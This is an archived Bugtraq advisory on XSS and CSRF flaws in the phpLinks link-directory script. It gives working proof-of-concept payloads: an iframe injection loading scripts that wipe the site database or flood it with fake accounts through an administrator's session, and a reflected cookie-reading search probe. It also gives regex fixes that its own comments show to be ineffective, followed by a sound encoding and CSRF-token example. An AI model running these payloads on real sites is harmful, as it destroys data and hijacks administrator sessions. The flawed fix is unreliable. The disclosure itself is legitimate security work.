88395 2003-01-21  00:11  /183 lines/ JeiAr <jeiar@kmfms.com>
Imported: 2003-01-21  00:11  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <3065>
Subject: Multiple Vulnerabilities In PHPLinks
------------------------------------------------------------


phpLinks is a free, open source PHP script for running a link directory
("link farm") or search engine. It offers multilevel site categorization,
infinite threaded search and more, and is very simple to set up. There is
a fault in the include/add.php script that lets a remote attacker inject
HTML and JavaScript into a site submission; the injected code then runs in
the browser of the administrator who reviews that submission, with the
administrator's privileges. The vulnerability comes from improper input
validation (the submitted fields are stored and displayed unescaped) and
improper session authentication (the admin scripts act on any GET request
that carries the admin's session cookie, so the injected code can drive
them). Below is some example code that I have written.

Put this in one of the fields on the "Add Site" form located at
http://blah/phplinks/index.php?show=add&PID=
If you inject the code into the Site Title or Site URL field, it will run
as soon as a logged-in administrator views the submission.

<iframe src=http://blah/death.html></iframe>


Below is the code for the called file "death.html"

---------------------------------------------------------------------------
<script language=JavaScript>
var i = 10; // site ID to start deleting from. The loop below never reaches
            // zero, so it runs until the browser is killed (the "window bomb")
var BaseURL = "http://victimsite/phplinks/"; // trailing slash, so paths below have none

// this resets the database
window.open(BaseURL + 'admin/reset.php?reset_in=&reset_out=&search_terms=&referrers=&submit=');

function Waste()
{
    while (i) {
        // one popup per site; the admin's session cookie is sent with each GET
        window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i + '&sure=Yes');
        i++;
    }
}
</script>
<body onLoad="Waste();">
---------------------------------------------------------------------------


As you can see, when that code runs (called by a logged-in admin
validating sites), the database is in a lot of cases going to be left
empty. By the way, dbtable=links can be changed to dbtable=temp in order
to affect sites not yet approved, etc. On the other hand, you can add
users to the database and more. Take the following code for example:


<iframe src=http://blah/life.html></iframe>


Below is the code for the called file "life.html"



---------------------------------------------------------------------------
<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/"; // trailing slash, so paths below have none

function Gluttony()
{
    while (i) { // never terminates: keeps adding entries until the browser is killed
        i++;
        window.open(BaseURL + 'admin/add_site.php'
            + '?SiteName=JeiAr0wnethTheee' + i
            + '&SiteURL=http://www.b' + i + 'j.orfd'
            + '&Description=' + i + '3333333333333333333333333333333333'
            + '&Category=&Country=Turkey.gif'
            + '&Email=1@t.' + i
            + '&UserName=12345' + i
            + '&Password=12345678&Hint=12345678910'
            + '&add=' + i + '&sure=Yes');
    }
}
</script>
<body onLoad="Gluttony();">
---------------------------------------------------------------------------

Once again, when a logged-in admin goes to validate sites (unless they
have a popup killer, JS disabled, etc.), they are going to be adding MANY
users to the database before they really realize what's happening. This
also jolts the server quite a bit by hogging resources. You can basically
change almost anything that the admin can by just injecting code. Also
note that these proof-of-concept scripts could be altered to supply large
numbers of malformed site submissions, or instead to do something worse
like pop-under windows, etc. But I do not feel it would be very good to
release a script like that publicly :) Also note that, for whatever
reason, the most up-to-date Norton AV does not pick this script up as a
window bomb. Maybe it's because my JavaScript is so bastardized it doesn't
recognize the code at all. heheh j/k. I put together a quick fix. I am no
PHP guru, so if there is a better way then please correct me :)


In the includes/add.php file find the following


// Handle form submission
if(isset($submit_add)){

And right below it paste the following code

//////////////////////////////////////////////////////////////////////////
// PHPLinks Critical XSS Vulnerability Fix - By JeiAr - jeiar@kmfms.com //
//////////////////////////////////////////////////////////////////////////
$ip   = $_SERVER['REMOTE_ADDR'];      // same values as $REMOTE_ADDR and
$info = $_SERVER['HTTP_USER_AGENT'];  // $HTTP_USER_AGENT, without register_globals
$err  = '';
// Metacharacter check. Note the trailing "$": the pattern only matches when a
// field ENDS in one of these characters, so "<b onmouseover=...>x" passes.
// Simply dropping the anchor is not a cure either: "." and "-" are in the
// class, so every URL and most descriptions would then be rejected.
$meta = '[-!#$%&\'"*+\\.<->=?^_`{|}]$';
if (ereg($meta, $SiteName))    {$err .= "Please enter a valid Site Name.<BR>";}
if (ereg($meta, $SiteURL))     {$err .= "Please enter a valid Site URL.<BR>";}
if (ereg($meta, $Description)) {$err .= "Enter a valid Description.<BR>";}
if (ereg($meta, $Category))    {$err .= "Enter a valid Category.<BR>";}
if (ereg($meta, $Country))     {$err .= "Enter a valid Country.<BR>";}
if (ereg($meta, $UserName))    {$err .= "Enter a valid UserName.<BR>";}
if (ereg($meta, $PW))          {$err .= "Please enter a valid Password.<BR>";}
if (ereg($meta, $PW2))         {$err .= "Please enter a valid Password.<BR>";}
if (ereg($meta, $Hint))        {$err .= "Please enter a valid Hint.<BR>";}
if ($err) {
echo $err;
echo "<b>Possible Hack Attempt!!</b><br>";
// The User-Agent is attacker-supplied too, so escape it before echoing it back.
echo "<b>" . htmlspecialchars($ip) . "</b><br>";
echo "<b>" . htmlspecialchars($info) . "</b><br>";
echo "<a href=index.php?show=add>Back</a>";
exit;
}
/////////////////////////////////////////////////////////////////////////



There is also a much less serious but similar issue with the search
feature: the search term is echoed back unescaped, so you can execute just
about any JavaScript or HTML code, and maybe more. Here is an example:
http://www.blah.org/index.php?term=<script>alert(document.cookie)</script>
And if you write a script to send many automated malformed search
strings, the code will show up among the most searched for terms on the
main search page, thus running any code you supply in the browsers of the
site's visitors. Below is a quick fix for that; I basically just ereg the
input for invalid metacharacters.


in includes/results.php find the following

if(isset($term) && strlen($term)>0){

Below it place the following

/////////////////////////////////////////////////////////////////////////
// PHPLinks XSS Vulnerability Fix - By JeiAr - jeiar@kmfms.com 01-2003 //
/////////////////////////////////////////////////////////////////////////
$ip   = $_SERVER['REMOTE_ADDR'];      // same values as $REMOTE_ADDR and
$info = $_SERVER['HTTP_USER_AGENT'];  // $HTTP_USER_AGENT, without register_globals
$err  = '';
// Same anchored check as in add.php: only the LAST character of $term is
// tested, so "<script>alert(1)</script>x" is accepted.
if (ereg('[-!#$%&\'"*+\\.<->=?^_`{|}]$', $term)) {$err .= "Please enter a valid Search Term.<BR>";}
if ($err) {
echo $err;
echo "<b>Possible Hack Attempt!!</b><br>";
// The User-Agent is attacker-supplied too, so escape it before echoing it back.
echo "<b>" . htmlspecialchars($ip) . "</b><br>";
echo "<b>" . htmlspecialchars($info) . "</b><br>";
echo "<a href=index.php>Back</a>";
exit;
}
////////////////////////////////////////////////////////////////////////
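Added example, not phpLinks code and not part of the original post. Both fixes above scan the input for metacharacters, but the pattern is anchored to the end of the field (only the last character is tested), and unanchoring it would reject every URL and sentence because "." and "-" are in the class. The two controls below instead address what the iframe payloads and the search probe actually rely on: untrusted fields are escaped at the point where they are rendered (the admin's validation page, the search results page and the "most searched for" list), and the admin action scripts (admin/delete_site.php, admin/add_site.php, admin/reset.php) only act on a POST that carries a per-session token, which a hidden <iframe> or window.open() cannot supply. The pl_* function names, the $_SESSION['pl_csrf'] key, the column names and the row layout are assumptions for illustration; the real phpLinks templates are not known from this post.

```php
<?php
// Added example (not phpLinks code). Function names, session key and the
// column names SiteName/SiteURL/Description are assumptions for illustration.

// --- 1. Output encoding -----------------------------------------------------

// Encode a value for use as HTML text or inside a quoted attribute. The charset
// argument should match the charset the page declares (assumed Latin-1 here).
function pl_html($value)
{
    return htmlspecialchars((string) $value, ENT_QUOTES, 'ISO-8859-1');
}

// Only http(s) URLs are accepted in the Site URL field; javascript:, data: and
// raw HTML are replaced by an empty string so nothing dangerous is ever linked.
function pl_safe_url($url)
{
    $url = trim((string) $url);
    if (!preg_match('#^https?://[^\s<>"\']+$#i', $url)) {
        return '';
    }
    return $url;
}

// Render one pending submission the way an admin "validate sites" row might.
function pl_render_pending_row($site)
{
    $url   = pl_safe_url($site['SiteURL']);
    $link  = ($url !== '')
        ? '<a href="' . pl_html($url) . '">' . pl_html($url) . '</a>'
        : '(invalid URL)';
    return '<tr><td>' . pl_html($site['SiteName']) . '</td>'
         . '<td>' . $link . '</td>'
         . '<td>' . pl_html($site['Description']) . '</td></tr>';
}

// --- 2. CSRF protection for admin actions -----------------------------------

// One random token per session; random_bytes()/hash_equals() need PHP 7, the
// fallbacks are the older idioms for the PHP 4/5 that phpLinks ran on.
function pl_csrf_token()
{
    if (empty($_SESSION['pl_csrf'])) {
        $_SESSION['pl_csrf'] = function_exists('random_bytes')
            ? bin2hex(random_bytes(16))
            : md5(uniqid(mt_rand(), true));
    }
    return $_SESSION['pl_csrf'];
}

// Hidden field that every admin form (delete, add, reset) must carry.
function pl_csrf_field()
{
    return '<input type="hidden" name="csrf" value="' . pl_html(pl_csrf_token()) . '">';
}

// Call at the top of each admin action script, after session_start() and the
// admin login check. A GET (what window.open() and <iframe src=...> issue) is
// refused, and a POST without the session's token is refused.
function pl_require_admin_post()
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        return false;
    }
    $sent = isset($_POST['csrf']) ? (string) $_POST['csrf'] : '';
    $want = isset($_SESSION['pl_csrf']) ? (string) $_SESSION['pl_csrf'] : '';
    if ($want === '' || $sent === '') {
        return false;
    }
    return function_exists('hash_equals') ? hash_equals($want, $sent) : ($want === $sent);
}

// --- Demonstration with the advisory's own payloads (constructed input) ------
session_start();

$pending = array(                                   // a stored submission
    'SiteName'    => '<iframe src=http://blah/death.html></iframe>',
    'SiteURL'     => 'javascript:alert(document.cookie)',
    'Description' => 'harmless text',
);
echo pl_render_pending_row($pending), "\n";        // iframe shown as literal text, URL dropped

$term = '<script>alert(document.cookie)</script>';   // the reflected search probe
echo '<p>Results for: ' . pl_html($term) . '</p>', "\n";

// What the delete link on the validation page becomes: a POST form with token.
echo '<form method="post" action="admin/delete_site.php">', pl_csrf_field(),
     '<input type="hidden" name="dbtable" value="links">',
     '<input type="hidden" name="ID" value="42">',
     '<input type="submit" value="Delete"></form>', "\n";
```

In admin/delete_site.php, admin/add_site.php and admin/reset.php the check is a guard at the top: if pl_require_admin_post() returns false, send a 403 and exit before touching the database, and read ID, dbtable and the rest from $_POST. With that in place the death.html and life.html scripts above still open their popups, but every request they make is a GET without a token and is refused, and the same "most searched for" list is rendered through pl_html() so a stored term cannot become markup.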


One bad thing about the most-searched-for keywords feature is that
anyone can put their web page, name, or something obscene as a search
term. After clicking submit xxx number of times, they now have whatever
they want on your main search page. Not really a security issue, but it
could be annoying, don't you think? And if someone used some CSS they
could basically deface the site in a really lame kind of way.

Note that this has only been tested on the latest version of phpLinks.
Older versions may not be affected, but I kind of doubt it.


JeiAr - CyberArmy Security Research ACAT Team

http://www.gulftech.org
http://www.security-research.org
(88395) /JeiAr <jeiar@kmfms.com>/---------(Rewrapped)